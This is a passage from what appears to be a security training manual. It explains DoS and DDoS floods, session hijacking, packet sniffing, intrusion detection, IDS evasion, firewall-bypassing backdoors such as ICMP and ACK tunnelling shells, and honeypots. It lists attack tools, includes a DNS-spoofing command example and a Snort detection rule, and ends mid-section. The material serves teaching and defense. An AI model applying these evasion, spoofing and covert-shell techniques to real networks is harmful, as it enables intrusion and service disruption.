handshake between two Internet applications. It's designed to work by starting an
application session by sending a TCP SYN (synchronization) packet to another
program. That application then replies with a TCP SYN-ACK acknowledgment packet;
the first program then responds with an ACK (acknowledgment). Once the applications
have made their handshake, they're ready to work with each other.
A SYN attack overwhelms its victim with a flood of TCP SYN packets. Every SYN
packet forces the targeted server to produce a SYN-ACK response and then wait for the
appropriate ACK. This quickly leads to a situation where outstanding SYN-ACKs pile up
behind each other in a backlog queue. When the backlog queues fill up, the system
stops acknowledging incoming SYN requests.
If the SYN attack includes SYN packets with bad source IP addresses, the situation
grows worse more quickly. In such a case, when the SYN-ACKs are sent out, the ACK
never comes back. The quickly overfilling backlog queue usually puts an end to
legitimate application SYN requests getting through.
9.2.4 Land Attack
Adding insult to injury, the similar Land attack employs spoofed SYN packets, with IP
addresses forged to look like they come from within your network. Now, the SYN attacks
appear to be coming from within your firewall, adding to your problems.
Most up-to-date operating systems and firewalls can stop SYNing in its tracks. Another
easy way to prevent SYNing is to set your firewall to block all incoming packets with
known bad source IP addresses. This list should include external packets that bear
spoofed IP addresses from the following IP ranges, which are reserved for internal use
only: 10.0.0.0 to 10.255.255.255, 127.0.0.0 to 127.255.255.255, 172.16.0.0 to
172.31.255.255, and 192.168.0.0 to 192.168.255.255.
_______________________________________________________________________________________
9.2.5 Smurf Attack
But why should your enemies worry about sneaking in the back windows when they can
simply bulldoze your systems? That's the approach that the Smurf attack and the User
Datagram Protocol (UDP) flood use.
When you're Smurfed, your enemy floods your router with Internet Control Message
Protocol (ICMP) echo request packets--a special kind of ping packet. Each packet's
destination IP address is also your broadcast address, which causes your router to
broadcast the ICMP packets to all your network's hosts. Needless to say, with a large
network, this quickly leads to an electronic traffic jam of mammoth proportions. And as
with the Land attack, if the cracker combines Smurfing with spoofing, matters get even
worse.
It's not as easy to deal with UDP flood DoS attacks, since some legal applications, like
Real Video, use UDP. In a UDP flood, an attacker spoofs a call to connect one system's
UDP chargen service, a test program that generates characters for received packets,
with another system's UDP echo service. The result? Chargen's semi-random
characters are reflected back and forth between systems, starving legitimate
applications' bandwidth needs.
9.3 How DoS Works?____________________________
Now to go into details of the attacks. While there are variations, they generally take a
common form. The controlled machines being used to mount the attacks send a stream
of packets. For most of the attacks, these packets are directed at the victim machine.
For one variant (called ``smurf'', named after the first circulated program to perform this
attack) the packets are aimed at other networks, where they provoke multiple echoes all
aimed at the victim. To go into further detail, some background description of the
Internet is in order.
The Internet consists of hundreds of thousands or millions of small networks (called
Local Area Networks, or LANs), all interconnected; attached to these LANs are many
millions of separate computers. Any of these computers can communicate with any
other computer. This works by assigning every computer an address. The addresses
are structured (organized into groups) so that special-purpose traffic-handling
computers, called routers, can direct them in the right direction to reach their intended
destination. A typical connection today may require 15 or more hops, crossing from one
LAN to another, before it reaches its final destination. But most of these ``LANs'' are
actually special-purpose links within and between network transport companies. These
backbone providers handle the hard problems of routing traffic.
_______________________________________________________________________________________
Looking a little closer, when one computer wants to send a message to another, it
divides it into fixed-size pieces, called ``packets''. Each of these packets is handled
separately by the Internet, then the message (if it is larger than a single packet) is
reassembled at the remote computer. So the traffic passing between machines consists
entirely of packets of data. Each of these packets has a pair of addresses in it, called
the Source and Destination IP (for Internet Protocol) addresses. These are the
addresses of the originating machine, and the recipient. They are quite analogous to the
address and return address on an envelope, in traditional mail.
When such a packet is sent over the Internet, it is passed first to the nearest router;
commonly this router is at the point where the local network connects to the Internet.
This router is often called a border router. In larger organizations the story may be more
complex; a large organization often assembles its own collection of LANs,
interconnected into an in-house internet, cross-connected at one or more points (often
with firewalls) with the Internet that we all know and love. But returning to our tale, when
a packet leaves a computer, it is passed to a border router. This router passes it
upstream to a core router, which interconnects with many other core routers all over the
Internet; they pass the packet on until it reaches its destination. The source address is
normally ignored by routers; it normally only tells the final destination machine where the
request is coming from. That's an essential part of the problem we face today.
The packets used in today's DoS attacks use forged source addresses; they are lying
about where the packet comes from. The very first router to receive the packet can very
easily catch the lie; it has to know what addresses lie on every network attached to it, so
that it can correctly route packets to them. If a packet arrives, and the source address
doesn't match the network it's coming from, the router should discard the packet. This
style of packet checking is called variously Ingress or Egress filtering, depending on the
point of view; it is Egress from the customer network or Ingress to the heart of the
Internet. If the packet is allowed past the border, catching the lie is nearly impossible.
Returning to our analogy, if you hand a letter to a letter-carrier who delivers to your
home, there's a good chance he could notice if the return address is not your own. If you
deposit a letter in the corner letter-box, the mail gets handled in sacks, and routed via
high-volume automated sorters; it will never again get the close and individual attention
required to make any intelligent judgments about the accuracy of the return address.
Likewise with forged source addresses on internet packets: let them past the first border
router, and they are unlikely to be detected.
Now let's look at the situation from the victim's point of view. The first thing you know,
the first sign that you may have a problem, is when thousands of compromised systems
all over the world commence to flood you with traffic, all at once. The first symptom is
likely to be a router crash, or to look a lot like one; traffic simply stops flowing between
you and the Internet. When you look more closely you may discover that one or more
targeted servers are being overloaded by the small fraction of the traffic that actually
gets delivered, but the failures extend much further back.
_______________________________________________________________________________________
So you try and find out what's going wrong. After the first few quick checks don't solve
the problem, you look at the traffic flowing through your network, and about then you
realize you are a victim of a major denial of service attack. So you capture a sample of
the packets flying over your net, as many as you can. What does each packet tell you?
Well, it will have your address as its destination address, and it will have some random
number as a source address. There's no trace of the compromised host that is busy
attacking you now. All that's there is a low-level, hardware address of the last router that
forwarded the packet; these low-level addresses are used to handle distribution of
packets within a LAN. So you can see what router passed the packet to you, but nothing
else. Identifying that router may identify the Internet carrier that passed the traffic to you,
if you don't have a complex internet of your own, within your own organization. But
either way, the next step is to capture another packet on the other side of the forwarding
router, and see where that packet came from. Each step of the trace requires starting
over, collecting fresh evidence.
Every time the back-trace crosses an administrative boundary, between you and your
Internet provider, between them and the next backbone provider on the path, all the way
back to the compromised machine, you have to enlist the aid of another team of
administrators to collect fresh evidence and carry the trace further back.
Now remember that you have to do this in thousands of directions, to each of the
thousands of compromised machines that are participating in this attack. Today there's
no possibility of performing more than a few back-traces at most, in as little as a few
hours. Even that would require some luck to favor your efforts. So as long as the
attacker turns their attack off after at most a few hours, you are unlikely to find more
than a few of the thousands of machines used to launch the attack; the remainder will
remain available for further attacks. And the compromised machines that are found will
contain no evidence that can be used to locate the original attacker; your trace will stop
with them.
9.4 What is DDoS? ______________________________
DDoS attacks involve breaking into hundreds or thousands of machines all over the
Internet. Then the attacker installs DDoS software on them, allowing them to control all
these burgled machines to launch coordinated attacks on victim sites. These attacks
typically exhaust bandwidth, router processing capacity, or network stack resources,
breaking network connectivity to the victims.
So the perpetrator starts by breaking into weakly-secured computers, using well-known
defects in standard network service programs, and common weak configurations in
operating systems. On each system, once they break in, they perform some additional
steps. First, they install software to conceal the fact of the break-in, and to hide the
traces of their subsequent activity. For example, the standard commands for displaying
running processes are replaced with versions that fail to display the attacker's
_______________________________________________________________________________________
processes. These replacement tools are collectively called a ``rootkit'', since they are
installed once you have ``broken root'', taken over system administrator privileges, to
keep other ``root users'' from being able to find you. Then they install a special process,
used to remote-control the burgled machine. This process accepts commands from over
the Internet, and in response to those commands it launches an attack over the Internet
against some designated victim site. And finally, they make a note of the address of the
machine they've taken over. All these steps are highly automated. A cautious intruder
will begin by breaking into just a few sites, then using them to break into some more,
and repeating this cycle for several steps, to reduce the chance they are caught during
this, the riskiest part of the operation. By the time they are ready to mount the kind of
attacks we've seen recently (gigabytes per second of traffic dumped on Yahoo,
according to reports in SANS) they have taken over thousands of machines and
assembled them into a DDoS network; this just means they all have the attack software
installed on them, and the attacker knows all their addresses (stored in a file on their
control system).
Now comes time for the attack. The attacker runs a single command, which sends
command packets to all the captured machines, instructing them to launch a particular
attack (from a menu of different varieties of flooding attacks) against a specific victim.
When the attacker decides to stop the attack, they send another single command.
9.5 Hacking Tool: Ping of Death ___________________
In 1996 and 1997, a common practice in the hacker community involved sending
malicious ICMP packets to computers on the Internet with the intention of "crashing"
them. This technique became known as the Ping of Death for its unpredictable
consequences and its relatively high probability of success.
The technique only worked because many network operating systems at the time were
not designed to handle these packets gracefully. Earlier versions of UNIX and Linux
computers, Macintoshes, NetWare servers, and some Windows computers were all
prone to attack. In a nutshell, the Ping of Death involved sending an unusually large
ICMP request that created buffer overflow conditions on the remote computers. Such
overflows could hang the computer's network applications, crash the operating system,
or possibly create other undesirable effects.
Although developers quickly fixed the "holes," actually these operating systems were
susceptible to other sources of buffer overflow besides ping. Effectively any oversized
(larger than 64 kilobyte) IP packet -- TCP, UDP, ICMP, and others -- could do the trick;
ping utilities merely happened to be more convenient way to generate them.
Hacking Tool: SSPing
Hacking Tool: Land
Hacking Tool: Smurf
_______________________________________________________________________________________
Hacking Tool: SYN Flood
Hacking Tool: CPU Hog
Hacking Tool: Win Nuke
Hacking Tool: RPC Locator
Hacking Tool: Jolt2
Hacking Tool: Bubonic
Hacking Tool: Targa
9.6 Tools for Running DDoS Attacks _______________
Hacking Tool: Trinoo
Hacking Tool: WinTrinoo
Hacking Tool: TFN
Hacking Tool: TFN2K
Hacking Tool: Stacheldraht
Hacking Tool: Shaft
Hacking Tool: mstream
DDoS Attack Sequence
Preventing DoS Attack
DoS Scanning Tools
Find_ddos
SARA
DDoSPing
RID
Zombie Zapper
9.7 SESSION HIJACKING_________________________
9.7.1 What is Session Hijacking?
TCP session hijacking is when a hacker takes over a TCP session between two
machines. Since most authentications only occur at the start of a TCP session, this
allows the hacker to gain access to a machine.
A popular method is using source-routed IP packets. This allows a hacker at point A on
the network to participate in a conversation between B and C by encouraging the IP
packets to pass through its machine.
If source-routing is turned off, the hacker can use "blind" hijacking, whereby it guesses
the responses of the two machines. Thus, the hacker can send a command, but can
never see the response. However, a common command would be to set a password
allowing access from somewhere else on the net.
_______________________________________________________________________________________
A hacker can also be "inline" between B and C using a sniffing program to watch the
conversation. This is known as a "man-in-the-middle attack".
A common component of such an attack is to execute a denial-of-service (DoS) attack
against one end-point to stop it from responding. This attack can be either against the
machine to force it to crash, or against the network connection to force heavy packet
loss.
Hacking Tool: Juggernaut
Hacking Tool: Hunt
Hacking Tool: TTYWatcher
Hacking Tool: IP Watcher
Hacking Tool: T-Sight
9.8 Sniffers_________________________
9.8.1 Introduction
Its a cruel irony in information security that many of the features that make using
computers easier or more efficient and the tools used to protect and secure the network
can also be used to exploit and compromise the same computers and networks. This is
the case with packet sniffing.
A packet sniffer, sometimes referred to as a network monitor or network analyzer, can
be used legitimately by a network or system administrator to monitor and troubleshoot
network traffic. Using the information captured by the packet sniffer an administrator can
identify erroneous packets and use the data to pinpoint bottlenecks and help maintain
efficient network data transmission.
In its simple form a packet sniffer simply captures all of the packets of data that pass
through a given network interface.
Typically, the packet sniffer would only capture packets that were intended for the
machine in question. However, if placed into promiscuous mode, the packet sniffer is
also capable of capturing ALL packets traversing the network regardless of destination.
By placing a packet sniffer on a network in promiscuous mode, a malicious intruder can
capture and analyze all of the network traffic. Within a given network, username and
password information is generally transmitted in clear text which means that the
information would be viewable by analyzing the packets being transmitted.
_______________________________________________________________________________________
A packet sniffer can only capture packet information within a given subnet. So, its not
possible for a malicious attacker to place a packet sniffer on their home ISP network and
capture network traffic from inside your corporate network (although there are ways that
exist to more or less "hijack" services running on your internal network to effectively
perform packet sniffing from a remote location). In order to do so, the packet sniffer
needs to be running on a computer that is inside the corporate network as well.
However, if one machine on the internal network becomes compromised through a
Trojan or other security breach, the intruder could run a packet sniffer from that machine
and use the captured username and password information to compromise other
machines on the network.
9.9 Tools used for Sniffing:
1.
2.
3.
4.
Ethereal
Snort
Windump
Etherpeek
_______________________________________________________________________________________
9.9.1 Tool: Ethereal
Figure: 9.1
_______________________________________________________________________________________
9.9.2 Tool: Snort
Figure: 9.2
There are three main modes in which Snort can be configured:
Sniffer, Packet logger, and Network Intrusion Detection System
1. Sniffer mode simply reads the packets off of the network and displays them for you in a continuous
stream on the console.
2. Packet logger mode logs the packets to the disk.
3. Network intrusion detection mode is the most complex and configurable configuration, allowing
Snort to analyze network traffic for matches against a user defined rule set
_______________________________________________________________________________________
9.9.3 Tool: Windump
Figure: 9.3
WinDump is the porting to the Windows platform of Tcpdump, the most used network sniffer/analyzer
for UNIX.
9.9.4 Tool: Etherpeek
Figure: 9.4
_______________________________________________________________________________________
Passive Sniffing
Figure: 9.4
Active Sniffing
Figure: 9.5
9.9.5 EtherFlood
1. EtherFlood floods a switched network with Ethernet frames with random hardware addresses.
2. The effect on some switches is that they start sending all traffic out on all ports so that the
attacker is able to sniff all traffic on the network.
_______________________________________________________________________________________
9.9.6 dsniff
dsniff is a collection of tools for network auditing and penetration testing.
1. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for
interesting data(passwords, e-mail, files, etc.).
2. arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to
an attacker (e.g, due to layer-2 switching).
3. sshmitm and webmitm implement active monkey-in the-middle attacks against redirected SSH
and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
9.9.7 ARP Spoofing
Figure: 9.6
9.9.8 Sniffing HTTPS and SSH
1. SSL connection uses a session key to encrypt all data sent by server and client.
2. SSH is based on the public key encryption idea.
3. With SSH a session key is transmitted in an encrypted fashion using a public key stored on the
server.
4. As such, these protocols – SSL and SSH are sound from a security standpoint. The problem
however lies in the basis of these protocols – namely trust certificates and public keys.
_______________________________________________________________________________________
9.9.9 Man in the Middle Attack
Figure: 9.7
Macof, MailSnarf, URLSnarf, WebSpy
1. Macof floods the local network with random MAC addresses, causing some switches to fail open
in repeating mode, and thereby facilitates sniffing.
2. Mailsnarf is capable of capturing and outputting SMTP mail traffic that is sniffed on the network.
3. urlsnarf is a neat tool for monitoring Web traffic.
4. Webspy allows the user to see all the WebPages visited by the victim.
9.9.10 Ettercap
Figure: 9.8
_______________________________________________________________________________________
9.9.11 SMAC
SMAC is a utility for setting a specific MAC address for a network interface.
Figure: 9.9
9.9.12 Mac Changer
1. MAC changer is a Linux utility for setting a specific MAC address for a network interface.
2. It enables the user to set the MAC address randomly. It allows specifying the MAC of another
vendor or setting another MAC of the same vendor.
3. The user can also set a MAC of the same kind (e.g.: wireless card).
4. It offers a choice of vendor MAC list (more than 6200 items) to choose from.
_______________________________________________________________________________________
9.9.13 Iris
Figure: 9.10
9.9.14 DNS Sniffing and Spoofing
1. DNS Spoofing is said to have occurred when a DNS entry points to another IP instead of the
legitimate IP address.
2. When an attacker wants to poison a DNS cache, he will use a faulty DNS – which can be his own
domain running a hacked DNS server. The DNS server is termed as hacked because the IP
address records are manipulated to suit the attacker’s needs.
9.9.15 WinDNSSpoof
This tool is a simple DNS ID Spoofer for Windows9x/2K.In order to use it you must be able to sniff traffic
of the computer being attacked.
Usage : wds –h
Example : wds -n www.microsoft.com -i 216.239.39.101
-g 00-00-39-5c-45-3b
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-10
IDS & Firewalls
Session Objectives:
Intrusion Detection Systems (IDS)
System Integrity Verifiers (SIV)
How Does IDS Match Signatures With Incoming Traffic?
Evading IDS Systems
Hacking Tool:
Placing Backdoors through Firewalls
Hacking Tool:
What Is A Honeypot?
_______________________________________________________________________________________
Introduction____________________________________
10.1 Intrusion Detection Systems (IDS)
1. Intrusion Detection Systems (IDS) monitors packets on the network wire and
attempts to discover if a hacker/hacker is attempting to break into a system (or
cause a denial of service attack).
2. A typical example is a system that watches for large number of TCP connection
requests (SYN) to many different ports on a target machine, thus discovering if
someone is attempting a TCP port scan.
3. Generally speaking, there are four different categories of intrusion detection
systems—network instruction detection, system integrity verifiers, log file
monitors, and deception systems.
4. Network intrusion detection systems (NIDS) monitor packets traversing the
system in an attempt to discover anomalies, indicating that an intruder trying to
break into a system, or worse—launch a distributed denial of service (DDoS)
attack. NIDSs look for frequent connection requests to different ports to reveal
port scans.
10.2 System Integrity Verifiers (SIV)________________
1. System Integrity Verifiers (SIV) monitor system files to find when an intruder
changes.
2. Tripwire is one of the popular SIVs.
3. SIVs may watch other components such as Windows registry as well as chron
configuration to find known signatures.
_______________________________________________________________________________________
Figure: 10.1
Anomaly Detection
1. The idea behind this approach is to measure a "baseline" of such stats as CPU
utilization, disk activity, user logins, file activity, and so forth.
2. The benefit of this approach is that it can detect the anomalies without having to
understand the underlying cause behind the anomalies.
Signature Recognition
This means that for every hacker technique, the engineers code something into
the system for that technique.
This can be as simple as a pattern match. The classic example is to examine
every packet on the wire for the pattern "/cgi-bin/phf?" which indicates an attempt
to access this vulnerable CGI script on a web-server.
Signature verification systems
A signature verification system has five components:
1. Data capture -- the process of converting the signature into digital form.
2. Preprocessing -- the data transformation in a standard format.
3. Feature extraction -- the process of extracting key information from the digital
representation of the signature.
4. Comparison process -- matches extracted features with templates stored in a
database. Usually, the output is a fit ratio.
_______________________________________________________________________________________
5. Performance evaluation -- the decision step typically made by thresholding the
fit value.
10.3 How does IDS match Signatures with Incoming
Traffic?
Existing IDS based on signature recognition focus on two kinds of activity data from a
computer network system network traffic data and computer audit data. A variety of
activity attributes can be obtained from these data, producing nominal variables such as
the event type, user id, process id, command, remote IP address, and numerical
variables such as the time stamp, CPU time, etc. Activity data from a computer network
system are huge and complex. A computer auditing facility, such as Solaris Basic
Security Module (BSM), can easily produce hundreds of thousands of audit records per
day, and the attributes extracted from each audit record can reach hundreds (e.g., 284
event types). As intrusive activities change over time, additional activity data must be
taken into account to capture signature patterns of new intrusive activities. That is, we
need a data mining algorithm that supports the scalable, incremental learning.
10.3.1 Protocol Stack Verification
RFCs (Request for Comments) specify how the IP protocol stack should work. Attacks
often exploit some IP weakness -often due to some incomplete RFC specification- or
stack implementations flaws. Known attacks include the Ping of Death, stealth scanning
and improper use of the TCP three way handshaking. It is worth to note that broken
hardware can also generate invalid traffic, not often filtered at source (e.g. on the hub),
that could appear as an ongoing attack.
10.3.2 Application Protocol Verification
Intruders often exploit application protocol weakness for crashing applications or
breaking into hosts. Attacks such as WinNuke and invalid packets that cause DNS
cache corruption fall into this category.
10.3.3 What Happens after IDS Detects an Attack?
Attacks can be considered attempts to penetrate a system or to circumvent a system's
security in order to gain information, modify information or disrupt the intended
functioning of the targeted network or system. The following is a list and explanation of
the most common types of Internet attack that an IDS is set up to detect.
Attacks: DOS - Denial of Service attack
Rather than penetrating a systems security by hacking, a DOS attack will just take the
system out, denying the service to its user. The means of achieving this are varied from
_______________________________________________________________________________________
buffer overflows to flooding the systems resources. These days systems are slightly
more DOS aware, this has resulted in DDOS attacks
Attacks: DDOS - Distributed Denial of Service
A standard DOS attack, the type that use large quantities of data from a single host to a
remote host, cannot deliver sufficient packets to achieve the desired result, therefore the
attack will be launched from many dispersed hosts, hence the name DDOS. Shear
weight of numbers take out either the remote system or swamp its connection. Steve
Gibson has written an article called The Strange Case of the Denial of Service Attacks
against GRC.com about how his network ground to a halt when a 13 year old boy
carried out a DDOS attack against him.
Attacks: Smurf
An older attack but one that is still frequently attempted, a smurf occurs when a ping is
sent to a smurf amplifiers broadcast address using the spoofed source address of the
target, all the active hosts will then reply to the target, swamping the connection.
Attacks: Trojans
The term Trojan comes from the wooden horse used by the Greeks to attack Troy. The
horse contained Greek soldiers who, once the horse was wheeled inside the city, spilled
out of the horse and laid siege to the city and its inhabitants. In computer terms it
originally referred to software that appears to be legitimate, but that actually contains
hidden malicious software. When the legitimate program was run, the malicious
software was installed, unknown to the user. However, as the majority of malicious
programs installed in this fashion were remote control tools, the term Trojan soon
evolved to refer to this type of tool, such as BackOrifice, SubSeven and NetBus etc.
IDS Software Vendors
1.
2.
3.
4.
5.
6.
7.
8.
9.
Black ICE by Network ICE (http://www.networkice.com)
CyberCop Monitor by Network Associates, Inc.(http://www.nai.com)
RealSecure by Internet Security Systems (ISS)(http://www.iss.net)
NetRanger by WheelGroup/Cisco (http://www.wheelgroup.com)
eTrust Intrusion Detection by Computer Associates(http://www.cai.com)
NetProwler by Axent (http://www.axent.com)
Centrax by Cybersafe (http://www.cybersafe.com)
NFR by Network Flight Recorder (http://www.nfr.net)
Dragon by Security Wizards (http://www.network-defense.com)
Snort (http://www.snort.org)
_______________________________________________________________________________________
Snort is an Open Source Intrusion Detection System. It contains over thousand
signatures and can be downloaded at http://www.snort.org/cgi-bin/done.cgi
Check out the following example:
In this example of PHF attack detection, a straight text string is searched for in the app
layer Alert tcp any any -> 192.168.1.0/24 80 (msg: “PHF attempt”; content: “/cgi-bin/phf”
;) It gives an alert, that a TCP connection from any IP address and any port to the
192.168.1.x subnet to port 80. It searches for the content "/cgi-bin/phf" anywhere in the
content. If it finds such content, it will alert the console with a message
"PHF attempt"
10.4 Evading IDS Systems________________________
1. Many simple network intrusion detection systems rely upon "pattern matching".
2. Attack scripts have well known patterns, so simply compiling a database of the
output of known attack scripts provide pretty good detection, but can easily be
evaded by simply changing the script.
3. IDS evasion focuses on foiling signature matching by altering an attacker’s
appearance.
4. For example, some POP3 servers are vulnerable to a buffer overflow when a
long password is entered. It is easy to evade simply by changing the attack script.
10.5 Complex IDS Evasion________________________
1. An intruder might send a TCP SYN packet that the IDS sees, but the victim host
never sees. This causes the IDS to believe the connection is closed, but when in
fact it is not. Since TCP connections do not send "keep-alives", the intruder could
wait hours or days after this "close" before continuing the attack.
2. The first attack is to find a way to pass packets as far as the IDS, and cause a
later router to drop packets.
3. This depends upon the router configuration, but typical examples include low TTL
fields, fragmentation, source routing, and other IP options.
4. If there is a slow link past the IDS, then the hacker can flood the link with high
priority IP packets, and send the TCP FIN as a low priority packet - the router's
queuing mechanism will likely drop the packet.
_______________________________________________________________________________________
10.6 Hacking Tool:_______________________________
10.6.1 Fragrouter
1. Fragrouter is a program for routing network traffic in such a way as to elude most
network intrusion detection systems.
2. Fragrouter allows attacks to avoid detection by network intrusion detection
systems.
3. For example, the Fragrouter could be used to obfuscate a phf attack against a
web server, a buffer overflow attack against a DNS server, or any number of
other attacks. fragrouter [ -i interface ] [ -p ] [ ATTACK] host
10.6.2 Hacking Tool: Tcpreplay
http://sourceforge.net/projects/tcpreplay/
1. Tcpreplay is a set of UNIX tools which allows the replaying of captured network
traffic.
2. It can be used to test a variety of network devices including routers, firewalls, and
NIDS. tcpreplay [ -i intf ] [ -l loop count ] [-r rate | -m multiplier ] file ...
10.6.3 Hacking Tool: SideStep.exe
http://www.robertgraham.com/tmp/sidestep.html
Sidestep is a hacking tool which evades network IDS in a completely different manner
compared to fragrouter.
_______________________________________________________________________________________
Figure: 10.2
10.6.4 Hacking Tool: Anzen NIDSbench
http://www.anzen.com/research/nidsbench/
Contains "fragrouter" that forces all traffic to fragment, which demonstrates how easy it
is for hackers/crackers to do the same in order to evade intrusion detection.
This accepts incoming traffic then fragments it according to various rules (IP
fragmentation with various sizes and overlaps, TCP segmentation again with various
sizes and overlaps, TCP insertion in order to de-synchronize the connection, etc.)
10.6.5 Hacking Tool: ADMutate
http://www.ktwo.ca/security.html
1. ADMutate accepts a buffer overflow exploit as input and randomly creates a
functionally equivalent version which bypasses IDS.
2. Once a new attack is known, it usually takes the IDS vendors a number of hours
or days to develop a signature. But in the case of ADMutate, it has taken months
for signaturebased IDS vendors to add a way to detect a polymorphic buffer
overflow generated by it.
_______________________________________________________________________________________
Tools to inject strangely formatted packets on to the wire
1.
2.
3.
4.
Libnet (http://www.packetfactory.net/libnet)
Rootshell (http://www.rootshell.com)
IPsend (http://www.coombs.anu.edu.au/âvalon)
Sun Packet Shell (psh) Protocol Testing Tool
(http://www.playground.sun.com/psh)
5. Net::RawIP (http://www.quake.skif.net/RawIP)
6. CyberCop Scanner’s CASL (http://www.nai.com)
10.6.6 Hacking through firewalls
1. One of the easiest and most common ways for an attacker to slip by a firewall is
by installing some network software on an internal system that communicates
using a port address permitted by the firewall's configuration.
2. A popular port to use is port 53 TCP, normally used by DNS.
3. Many firewalls permit all traffic using port 53 by default, because it simplifies
firewall configuration and reduces support calls.
10.6.7 Bypassing Firewall using Httptunnel
1. http://www.nocrew.org/software/httptunnel.html
2. Httptunnel creates a bidirectional virtual data path tunneled in HTTP requests.
The requests can be sent via an HTTP proxy if desired so.
Figure: 10.3
_______________________________________________________________________________________
10.7 Placing Backdoors through Firewalls___________
10.7.1 The reverse www shell
1. This backdoor should work through any firewall and allow users to surf the
WWW. A program is run on the internal host, which spawns a child every day at a
2. Special time.
3. For the firewall, this child acts like a user, using his Netscape client to surf on the
internet. In reality, this child executes a local shell and connects to the www
server operated by the hacker on the internet via a legitimate looking http request
and sends it ready signal.
4. The legitimate looking answer of the www server operated by the hacker is in
reality the commands the child will execute on its machine in the local shell.
10.7.2 Hiding Behind Covert Channel: Loki
http://www.phrack.com/phrack/51/P51-06
1. LOKI2 is an information-tunneling program. LOKI uses Internet Control Message
Protocol (ICMP) echo response packets to carry its payload. ICMP echo
response packets are normally received by the Ping program, and many firewalls
permit responses to pass.
2. We tunnel simple shell commands inside of ICMP_ECHO /ICMP_ECHOREPLY
and DNS name lookup query / reply traffic. To the network protocol analyzer, this
traffic seems like ordinary benign packets of the corresponding protocol. To
correct listener (the LOKI2 daemon) however, the packets are recognized for
what they really are.
10.8 Hacking Tool:_______________________________
10.8.1 007 Shell
http://www.s0ftpj.org/en/docs.html
007Shell is a Covert Shell ICMP Tunneling program. It works similar to Loki.
It works by putting data streams in the ICMP message past the usual 4 bytes (8-bit type,
8-bit code and 16-bit checksum).
_______________________________________________________________________________________
10.8.2 Hacking Tool: ICMP Shell
1. ICMP Shell (ISH) is a telnet-like protocol. It provides the capability of connecting
a remote host to open a shell using only ICMP for input and output.
2. The ISH server runs as a daemon on the server side. When the server receives a
request from the client, it will strip the header and look at the ID field, if it matches
the server's ID then it will pipe the data to "/bin/sh".
3. It will then read the results from the pipe and send them back to the client, where
the client then prints the data to stdout.
10.8.3 ACK Tunneling
1. Trojans normally use ordinary TCP or UDP communication between their client
and server parts.
2. Any firewall between the attacker and the victim that blocks incoming traffic will
usually stop all Trojans from working. ICMP tunneling has existed for quite some
time now, but if you block ICMP in the firewall, you will be safe from that.
3. ACK Tunneling works through firewalls that do not apply their rule sets on TCP
ACK segments (ordinary packet filters belong to this class of firewalls).
10.8.4 Hacking Tool: AckCmd
http://ntsecurity.nu/papers/acktunneling
1. AckCmd is a client/server combination for Windows 2000 that lets open a remote
command prompt to another system (running the server part of AckCmd.)
2. It communicates using only TCP ACK segments. This way the client component
is able to directly contact the server component through firewall in some cases.
Figure: 10.4
_______________________________________________________________________________________
10.9 What is a Honeypot?_________________________
The first step to understanding honeypots is defining what a honeypot is. This can be
harder then it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not
solve a specific problem. Instead, they are a highly flexible tool that comes in many
shapes and sizes. They can do everything from detecting encrypted attacks in IPv6
networks to capturing the latest in on-line credit card fraud. It’s this flexibility that gives
honeypots their true power. It is also this flexibility that can make them challenging to
define and understand. As such, I use the following definition to define what a honeypot
is. A honeypot is an information system resource whose value lies in unauthorized or
illicit use of that resource.
This is a general definition covering all the different manifestations of honeypots. We will
be discussing in this paper different examples of honeypots and their value to security.
All will fall under the definition we use above; their value lies in the bad guys interacting
with them. Conceptually almost all honeypots work they same. They are a resource that
has no authorized activity; they do not have any production value. Theoretically, a
honeypot should see no traffic because it has no legitimate activity. This means any
interaction with a honeypot is most likely unauthorized or malicious activity. Any
connection attempts to a honeypot are most likely a probe, attack, or compromise. While
this concept sounds very simple (and it is), it is this very simplicity that give honeypots
their tremendous advantages (and disadvantages). I highlight these below.
10.9.1 Advantages of Honeypots
Honeypots are a tremendously simply concept, which gives them some very powerful
strengths.
Small data sets of high value: Honeypots collect small amounts of information.
Instead of logging a one GB of data a day, they can log only one MB of data a day.
Instead of generating 10,000 alerts a day, they can generate only 10 alerts a day.
Remember, honeypots only capture bad activity; any interaction with a honeypot is most
likely unauthorized or malicious activity. As such, honeypots reduce 'noise' by collecting
only small data sets, but information of high value, as it is only the bad guys. This
means it’s much easier (and cheaper) to analyze the data a honeypot collects and
derives value from it.
1. New tools and tactics: Honeypots are designed to capture anything thrown at
them, including tools or tactics never seen before.
2. Minimal resources: Honeypots require minimal resources, they only capture bad
activity. This means an old Pentium computer with 128MB of RAM can easily
handle an entire class B network sitting off an OC-12 network.
_______________________________________________________________________________________
3. Encryption or IPv6: Unlike most security technologies (such as IDS systems)
honeypots work fine in encrypted or IPv6 environments. It does not matter what
the bad guys throw at a honeypot, the honeypot will detect and capture it.
4. Information: Honeypots can collect in-depth information that few, if any other
technologies can match.
5. Simplicity: Finally, honeypots are conceptually very simple. There are no fancy
algorithms to develop, state tables to maintain, or signatures to update. The
simpler a technology, the less likely there will be mistakes or misconfigurations.
10.9.2 Disadvantages Of Honeypots
